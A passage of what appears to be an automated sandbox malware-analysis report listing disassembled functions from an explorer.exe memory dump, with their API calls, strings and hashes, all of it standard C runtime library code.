                                                  • Instruction ID: ccdec8e43e25746fb4f48a4c825207b2cbc022ea0119709ab66865e6f35d8c68
                                                  • Opcode Fuzzy Hash: c49fee12880c109d117a1816aac59076fba470a180793ae2881633eb314cb8c3
                                                  • Instruction Fuzzy Hash: 36E012355A1234FFCE117F50FC0DA9D7E1EAF48A62B44C051F90956568CBB12AA08BD5
                                                  Function 03234709 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 03234712
                                                    • Part of subcall function 032381B6: HeapFree.KERNEL32(00000000,00000000,?,0324115C,?,00000000,?,8B18EC83,?,032413FF,?,00000007,?,?,032418A4,?), ref: 032381CC
                                                    • Part of subcall function 032381B6: GetLastError.KERNEL32(?,?,0324115C,?,00000000,?,8B18EC83,?,032413FF,?,00000007,?,?,032418A4,?,?), ref: 032381DE
                                                  • _free.LIBCMT ref: 03234725
                                                  • _free.LIBCMT ref: 03234736
                                                  • _free.LIBCMT ref: 03234747
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: b60df2c0a2b2e8cd19c4c69f65344c676c23fb504f617d412e16f615036dd5e8
                                                  • Instruction ID: d6b898ffc938335427871041c10461ee8816662778a35ac8c26df6b8cebd2ec5
                                                  • Opcode Fuzzy Hash: b60df2c0a2b2e8cd19c4c69f65344c676c23fb504f617d412e16f615036dd5e8
                                                  • Instruction Fuzzy Hash: 31E0BFB98323219E8E16FF19B8084867A31AF59A50701C006F8482A21DDF7905D6DF85
                                                  Function 0323346D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __startOneArgErrorHandling.LIBCMT ref: 032334FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: ErrorHandling__start
                                                  • String ID: pow
                                                  • API String ID: 3213639722-2276729525
                                                  • Opcode ID: 831453402c98a4bb09e3726ceea8570e6f2dfa166e236588e5c9d79a720b619f
                                                  • Instruction ID: 2497b639b815895f21c0c5ada3f79addc53adab6ac0643e29095c3f077281ccc
                                                  • Opcode Fuzzy Hash: 831453402c98a4bb09e3726ceea8570e6f2dfa166e236588e5c9d79a720b619f
                                                  • Instruction Fuzzy Hash: 1E51AEE7E3C20396CB12F714D90537EA794EF43B11F298999E5D24529CDB748AC88A42
                                                  Function 03233B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Windows\SysWOW64\explorer.exe
                                                  • API String ID: 0-2751450654
                                                  • Opcode ID: 09a35f588684868b728ab7bb400d9f4a1fa29ca756c41dad0925324ff07559fc
                                                  • Instruction ID: cf5a04a7ac5ebd0a2d1697dd58a2b9e6a923af656a240f5b78621361d94a28d9
                                                  • Opcode Fuzzy Hash: 09a35f588684868b728ab7bb400d9f4a1fa29ca756c41dad0925324ff07559fc
                                                  • Instruction Fuzzy Hash: 2D4172F9B20315AFDB25EF99D88499EBBB8EF86710F144466E604DB250DBB09BC0C750
                                                  Function 0322D0CC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0322D0F1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID: MOC$RCC
                                                  • API String ID: 2118026453-2084237596
                                                  • Opcode ID: 12f28e3e1df1b0d79e430cad3f4edec4514650dcea39851238ed31edbf2b6974
                                                  • Instruction ID: 2d9a2fa6f8a7904c274472dbe6a95406051884f13e2bfaa6a375ddebae693dc3
                                                  • Opcode Fuzzy Hash: 12f28e3e1df1b0d79e430cad3f4edec4514650dcea39851238ed31edbf2b6974
                                                  • Instruction Fuzzy Hash: 49416A7291026ABFCF15DF98CD80AEEBFB5FF48704F188099F914AA210D7759990DB50
                                                  Function 032044C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 032044EB
                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0320453A
                                                    • Part of subcall function 0322894E: _Yarn.LIBCPMT ref: 0322896D
                                                    • Part of subcall function 0322894E: _Yarn.LIBCPMT ref: 03228991
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3893096926.0000000003201000.00000020.00000001.01000000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                  • Associated: 0000000A.00000002.3893024528.0000000003200000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893433424.0000000003251000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893496020.0000000003266000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893535686.000000000326D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3893612156.0000000003273000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3200000_explorer.jbxd
                                                  Similarity
                                                  • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                  • String ID: bad locale name
                                                  • API String ID: 1908188788-1405518554
                                                  • Opcode ID: e6a8d2e397f88621e91c9d9a7845bc2e0172b90ae3cfc620838810eb0e4ba685
                                                  • Instruction ID: 07b3e5b36b942bb11456292825fc73a81c42117d0de8c97ef3d0f5a2edf2ab1a
                                                  • Opcode Fuzzy Hash: e6a8d2e397f88621e91c9d9a7845bc2e0172b90ae3cfc620838810eb0e4ba685
                                                  • Instruction Fuzzy Hash: CA11A071914B84AFD320CF69C90075BBFE8EF19614F008A5EE899C7B41E7B5A604CB95